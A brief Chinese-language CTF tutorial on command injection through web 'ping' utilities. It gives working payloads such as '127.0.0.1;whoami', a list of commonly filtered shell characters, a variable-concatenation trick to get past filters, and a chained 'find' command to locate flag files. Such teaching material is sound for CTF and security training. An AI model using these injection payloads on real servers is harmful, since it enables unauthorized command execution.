ping

ping命令在web题中的实训

ping命令在web题中的实训

ping命令的介绍

ping，因特网包探索器，用于测试网络连接器的程序。
ping是工作在TCP/IP网络体系结构中应用层的一个服务命令，主要是向特定的目的主机发送ICMP（因特网报文控制协议）Echo请求报文，测试目的站是否可达及了解其有关状态。

检测是否可以注入

传入参数127.0.0.1;whoami,如果存在注入的话，得到的结果是“www-data”。

在web中ping题目常用过滤字符

‘$’、’;’、’|’、’-‘、’(‘、’)’、’反引号’、’||’、’&&’、’&’、’{‘、’}’

ls访问目录

可以直接传参127.0.0.1;ls,需要解决过滤的话就是127.0.0.1;a=’l’;b=’s’;c=$a$b;$c(c这一块可能需要用出引号包裹起来)。

尝试寻找flag文件

127.0.0.1 &&find / -name “flag*”